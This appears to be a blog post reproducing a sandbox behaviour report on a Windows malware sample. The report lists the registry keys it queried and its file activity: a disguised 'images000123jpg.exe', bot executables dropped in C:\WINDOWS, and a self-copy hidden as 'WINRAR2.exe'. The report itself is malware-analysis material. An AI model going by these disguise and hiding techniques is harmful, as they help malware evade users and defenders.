HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\folder "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\folder "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\im ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\im "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\im "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\im "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\images ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\images "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\images "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\images "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\music ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\music "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\music "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\music "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\note ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\note "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\note "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\note "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\picture ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\picture "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\picture "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\picture "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\presentation ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\presentation "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\presentation "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\presentation "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\program ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\program "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\program "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\program "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\spreadsheet ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\spreadsheet "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\spreadsheet "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\spreadsheet "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\text ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\text "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\text "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\text "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\video ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\video "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\video "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\video "ScriptOk"
HKEY_LOCAL_MACHINE\SYSTEM\WPA\MediaCenter "Installed"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework "InstallRoot"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework "CLRLoadLogDir"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework "OnlyUseLatestCLR"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\.NETFramework\Performance "First Counter"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\.NETFramework\Performance "First Help"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib "EventLogLevel"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib "TotalInstanceName"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\PerfProc\Performance "DisplayHeapPerfObject"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\PerfProc\Performance "ProcessNameFormat"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\PerfProc\Performance "ThreadNameFormat"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\PSched\Performance "First Counter"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\PSched\Performance "First Help"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\SecurityService "10"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SecurityProviders "SecurityProviders"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msapsspc.dll "Name"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msapsspc.dll "Comment"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msapsspc.dll "Capabilities"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msapsspc.dll "RpcId"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msapsspc.dll "Version"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msapsspc.dll "Type"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msapsspc.dll "TokenSize"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\digest.dll "Name"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\digest.dll "Comment"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\digest.dll "Capabilities"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\digest.dll "RpcId"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\digest.dll "Version"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\digest.dll "Type"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\digest.dll "TokenSize"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msnsspc.dll "Name"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msnsspc.dll "Comment"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msnsspc.dll "Capabilities"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msnsspc.dll "RpcId"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msnsspc.dll "Version"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msnsspc.dll "Type"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msnsspc.dll "TokenSize"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\RSVP\Performance "First Counter"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\RSVP\Performance "First Help"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Telephony "Perf1"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Telephony "Perf2"
HKEY_PERFORMANCE_DATA "230 784"
HKEY_LOCAL_MACHINE\SYSTEM\WPA\MediaCenter "Installed"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework "InstallRoot"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework "CLRLoadLogDir"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework "OnlyUseLatestCLR"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\.NETFramework\Performance "First Counter"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\.NETFramework\Performance "First Help"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib "EventLogLevel"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib "TotalInstanceName"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\PerfProc\Performance "DisplayHeapPerfObject"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\PerfProc\Performance "ProcessNameFormat"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\PerfProc\Performance "ThreadNameFormat"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\PSched\Performance "First Counter"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\PSched\Performance "First Help"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\SecurityService "10"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SecurityProviders "SecurityProviders"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msapsspc.dll "Name"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msapsspc.dll "Comment"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msapsspc.dll "Capabilities"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msapsspc.dll "RpcId"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msapsspc.dll "Version"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msapsspc.dll "Type"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msapsspc.dll "TokenSize"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\digest.dll "Name"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\digest.dll "Comment"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\digest.dll "Capabilities"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\digest.dll "RpcId"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\digest.dll "Version"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\digest.dll "Type"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\digest.dll "TokenSize"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msnsspc.dll "Name"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msnsspc.dll "Comment"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msnsspc.dll "Capabilities"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msnsspc.dll "RpcId"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msnsspc.dll "Version"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msnsspc.dll "Type"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msnsspc.dll "TokenSize"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\RSVP\Performance "First Counter"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\RSVP\Performance "First Help"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Telephony "Perf1"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Telephony "Perf2"
HKEY_PERFORMANCE_DATA "230 784"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\SecurityService "DefaultAuthLevel"
Enums HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Search\ProtocolHandlers
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Search\ProtocolHandlers\File
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\AppPatch
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\AppPatch
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy
File Changes by all processes
New Files c:\images000123jpg.exe
C:\WINDOWS\CIMBOT.EXE
C:\WINDOWS\IMBOT.EXE
\Device\Tcp
\Device\Ip
\Device\Ip
\Device\Gpc
\Device\Tcp6
C:\WINDOWS\WINRAR2.exe
\Device\Tcp
\Device\Ip
\Device\Ip
\Device\Gpc
\Device\Tcp6
\Device\RasAcd
Opened Files C:\WINDOWS\Registration\R000000000007.clb
C:\WINDOWS\system32\de-DE\wshom.ocx.mui
C:\WINDOWS\system32\wshom.ocx
C:\WINDOWS\system32\stdole2.tlb
C:\WINDOWS\CIMBOT.EXE
\\.\PIPE\wkssvc
\\.\PIPE\lsarpc
C:\Programme\Windows Desktop Search\MSNLNamespaceMgr.dll
C:\WINDOWS\Registration\R000000000007.clb
C:\WINDOWS\AppPatch\sysmain.sdb
C:\WINDOWS\AppPatch\systest.sdb
\Device\NamedPipe\ShimViewer
C:\WINDOWS\
C:\WINDOWS\IMBOT.EXE.config
C:\WINDOWS\IMBOT.EXE
\\.\Ip
\\.\PIPE\EVENTLOG
\\.\PIPE\ROUTER
C:\WINDOWS\AppPatch\sysmain.sdb
C:\WINDOWS\AppPatch\systest.sdb
\Device\NamedPipe\ShimViewer
C:\WINDOWS\
C:\WINDOWS\WINRAR2.exe.config
C:\WINDOWS\WINRAR2.exe
\\.\Ip
\\.\PIPE\EVENTLOG
\\.\PIPE\ROUTER
C:\WINDOWS\WINRAR2.exe
Deleted Files C:\WINDOWS\CIMBOT.EXE
Chronological Order Get File Attributes: C:\WINDOWS\Registration Flags: (SECURITY_ANONYMOUS)
Open File: C:\WINDOWS\Registration\R000000000007.clb (OPEN_EXISTING)
Open File: C:\WINDOWS\system32\de-DE\wshom.ocx.mui (OPEN_EXISTING)
Open File: C:\WINDOWS\system32\wshom.ocx (OPEN_EXISTING)
Open File: C:\WINDOWS\system32\stdole2.tlb (OPEN_EXISTING)
Create/Open File: c:\images000123jpg.exe (OPEN_ALWAYS)
Get File Attributes: C:\WINDOWS\system32\.HLP Flags: (SECURITY_ANONYMOUS)
Get File Attributes: C:\WINDOWS\Help\.HLP Flags: (SECURITY_ANONYMOUS)
Create File: C:\WINDOWS\CIMBOT.EXE
Open File: C:\WINDOWS\CIMBOT.EXE (OPEN_EXISTING)
Create File: C:\WINDOWS\IMBOT.EXE
Delete File: C:\WINDOWS\CIMBOT.EXE
Open File: \\.\PIPE\wkssvc (OPEN_EXISTING)
Get File Attributes: c:\ Flags: (SECURITY_ANONYMOUS)
Get File Attributes: C:\WINDOWS\IMBOT.EXE Flags: (SECURITY_ANONYMOUS)
Get File Attributes: C:\WINDOWS\ Flags: (SECURITY_ANONYMOUS)
Open File: \\.\PIPE\lsarpc (OPEN_EXISTING)
Get File Attributes: C:\Dokumente und Einstellungen\Administrator\Eigene Dateien\desktop.ini Flags: (SECURITY_ANONYMOUS)
Get File Attributes: C:\Dokumente und Einstellungen\All Users\Dokumente\desktop.ini Flags: (SECURITY_ANONYMOUS)
Open File: C:\Programme\Windows Desktop Search\MSNLNamespaceMgr.dll (OPEN_EXISTING)
Get File Attributes: C:\WINDOWS\Registration Flags: (SECURITY_ANONYMOUS)
Open File: C:\WINDOWS\Registration\R000000000007.clb (OPEN_EXISTING)
Get File Attributes: C:\WINDOWS\IMBOT.EXE:Zone.Identifier Flags: (SECURITY_ANONYMOUS)
Open File: C:\WINDOWS\AppPatch\sysmain.sdb (OPEN_EXISTING)
Open File: C:\WINDOWS\AppPatch\systest.sdb (OPEN_EXISTING)
Open File: \Device\NamedPipe\ShimViewer (OPEN_EXISTING)
Open File: C:\WINDOWS\ ()
Find File: C:\WINDOWS\IMBOT.EXE
Get File Attributes: C:\WINDOWS\system32\mscoree.dll.local Flags: (SECURITY_ANONYMOUS)
Open File: C:\WINDOWS\IMBOT.EXE.config (OPEN_EXISTING)
Open File: C:\WINDOWS\IMBOT.EXE (OPEN_EXISTING)
Get File Attributes: C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727 Flags: (SECURITY_ANONYMOUS)
Find File: C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll
Create/Open File: \Device\Tcp (OPEN_ALWAYS)
Create/Open File: \Device\Ip (OPEN_ALWAYS)
Create/Open File: \Device\Ip (OPEN_ALWAYS)
Open File: \\.\Ip (OPEN_EXISTING)
Create/Open File: \Device\Gpc (OPEN_ALWAYS)
Create/Open File: \Device\Tcp6 (OPEN_ALWAYS)
Open File: \\.\PIPE\EVENTLOG (OPEN_EXISTING)
Open File: \\.\PIPE\ROUTER (OPEN_EXISTING)
Get File Attributes: C:\WINDOWS\WINRAR2.exe Flags: (SECURITY_ANONYMOUS)
Copy File: C:\WINDOWS\IMBOT.EXE to C:\WINDOWS\WINRAR2.exe
Set File Attributes: C:\WINDOWS\WINRAR2.exe Flags: (FILE_ATTRIBUTE_HIDDEN FILE_ATTRIBUTE_READONLY FILE_ATTRIBUTE_SYSTEM SECURITY_ANONYMOUS)
Open File: C:\WINDOWS\AppPatch\sysmain.sdb (OPEN_EXISTING)
Open File: C:\WINDOWS\AppPatch\systest.sdb (OPEN_EXISTING)
Open File: \Device\NamedPipe\ShimViewer (OPEN_EXISTING)
Open File: C:\WINDOWS\ ()
Find File: C:\WINDOWS\WINRAR2.exe
Get File Attributes: C:\WINDOWS\system32\mscoree.dll.local Flags: (SECURITY_ANONYMOUS)
Open File: C:\WINDOWS\WINRAR2.exe.config (OPEN_EXISTING)
Open File: C:\WINDOWS\WINRAR2.exe (OPEN_EXISTING)
Get File Attributes: C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727 Flags: (SECURITY_ANONYMOUS)
Find File: C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll
Create/Open File: \Device\Tcp (OPEN_ALWAYS)
Create/Open File: \Device\Ip (OPEN_ALWAYS)
Create/Open File: \Device\Ip (OPEN_ALWAYS)
Open File: \\.\Ip (OPEN_EXISTING)
Create/Open File: \Device\Gpc (OPEN_ALWAYS)
Create/Open File: \Device\Tcp6 (OPEN_ALWAYS)
Open File: \\.\PIPE\EVENTLOG (OPEN_EXISTING)
Open File: \\.\PIPE\ROUTER (OPEN_EXISTING)
Create/Open File: \Device\RasAcd (OPEN_ALWAYS)
Open File: C:\WINDOWS\WINRAR2.exe (OPEN_EXISTING)
Subscribe to:
Posts (Atom)